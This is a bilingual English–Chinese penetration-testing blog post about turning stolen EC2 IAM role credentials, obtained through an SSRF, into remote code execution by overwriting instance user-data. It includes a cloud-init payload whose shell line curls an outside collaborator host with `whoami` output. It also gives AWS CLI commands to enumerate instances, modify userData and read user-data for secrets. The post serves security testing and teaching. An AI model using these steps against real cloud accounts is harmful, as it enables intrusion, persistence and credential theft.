Hi Guys, Today we are going to see how a single AWS misconfiguration can lead to remote code execution on an EC2 instance. In the upcoming series of blogs, I will be sharing some of my techniques that I use to get RCE on EC2’s during different pentests.
嗨，大家好，今天我们将看看单个 AWS 错误配置如何导致在 EC2 实例上远程执行代码。在即将到来的系列博客中，我将分享一些我在不同的渗透测试中用于在 EC2 上获得 RCE 的技术。

What is User-data in EC2
什么是 EC2 中的用户数据

According to AWS “When you launch an instance in Amazon EC2, you have the option of passing user data to the instance that can be used to perform common automated configuration tasks and even run scripts after the instance starts. You can pass two types of user data to Amazon EC2: shell scripts and cloud-init directives.” You can find more details here.
根据 AWS 的说法，“当您在 Amazon EC2 中启动实例时，您可以选择将用户数据传递给实例，该实例可用于执行常见的自动配置任务，甚至可以在实例启动后运行脚本。您可以将两种类型的用户数据传递给 Amazon EC2：shell 脚本和 cloud-init 指令。您可以在此处找到更多详细信息。

So lets get Started 因此，让我们开始吧

During a black box assessment, I was able to find an SSRF on an EC2 instance and was able to get IAM role credentials for the instance. You can find more details regarding EC2 SSRF here. For demo purposes, I have replicated the same scenario on my AWS infrastructure.
在黑盒评估期间，我能够在 EC2 实例上找到 SSRF，并能够获取该实例的 IAM 角色凭证。您可以在此处找到有关 EC2 SSRF 的更多详细信息。出于演示目的，我在我的 AWS 基础设施上复制了相同的场景。

So the next question is what now. What are those keys ? How do i exploit those keys ?
所以下一个问题是现在是什么。这些关键是什么？如何利用这些密钥？

So whenever a developer wants an instance to access any other AWS service, they create an IAM role and then attach the IAM role to the instance. Using this role, the EC2 instance can access other AWS services during runtime. You can find more details on how to attach an IAM role to an EC2 instance here.
因此，每当开发人员希望实例访问任何其他 AWS 服务时，他们都会创建一个 IAM 角色，然后将该 IAM 角色附加到该实例。使用此角色，EC2 实例可以在运行时访问其他 AWS 服务。您可以在此处找到有关如何将 IAM 角色附加到 EC2 实例的更多详细信息。

So the next question is how we find which services this keys have access to during an black box assessment ? I prefer using the tool weirdAAL for the same.
那么下一个问题是我们如何找到这个密钥在黑匣子评估期间可以访问哪些服务？我更喜欢使用weirdAAL工具。

So after enumeration i was able to find that keys have access to some API’s for EC2. If your facing issue while running weirldAAL, you can refer following document.
因此，在枚举之后，我能够发现密钥可以访问 EC2 的某些 API。如果您在运行 weirldAAL 时遇到问题，可以参考以下文档。

I found that i was able to modify instance user-data. User-data contain shell script or cloud-init directives that instance needs to run while booting for the first time. After some research i found that you can run cloud-init directives every time whenever a system restarts. So i decided to use the following code. More details about the code can be found here.
我发现我能够修改实例用户数据。User-data 包含实例在首次启动时需要运行的 shell 脚本或 cloud-init 指令。经过一番研究，我发现每次系统重启时都可以运行 cloud-init 指令。所以我决定使用下面的代码。有关代码的更多详细信息，请参阅此处。

Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
curl http://i6p76otpl9evztt3nec3dro1dsjj79vy.oastify.com/?a=`whoami`
--//--

Note:- User-data will be executed whenever a stopped EC2 machine is restarted again. So modify the instance attribute of a stopped instance. So whenever anyone starts the instance, your code will be loaded.
注意：- 每当停止的 EC2 机器再次重新启动时，都会执行用户数据。因此，修改已停止实例的实例属性。因此，每当有人启动实例时，您的代码都会被加载。

To enumerate all the instance ids i used the following command.
为了枚举所有实例 ID，我使用了以下命令。

aws ec2 describe-instances --region ap-southeast-2 | grep InstanceId

To modify the user data store your code in base64 from and use the following command.
若要修改用户数据，请将代码存储在 base64 中，并使用以下命令。

aws ec2 modify-instance-attribute --instance-id i-087b2dfe70a253169 --attribute userData --value file://my_script_base64.txt --region ap-southeast-2

And once the EC2 was started back i got the hit on my collaborator server.
一旦 EC2 重新启动，我就在我的协作者服务器上受到了打击。

Note: — Even if you are not able to modify instance data try to view the user-data, as it may reveal many secret information like username, passwords, tokens, etc.
注意： — 即使您无法修改实例数据，也要尝试查看用户数据，因为它可能会泄露许多秘密信息，例如用户名、密码、令牌等。

aws ec2 describe-instance-attribute --instance-id i-1234567890abcdef0

Reference: — https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html.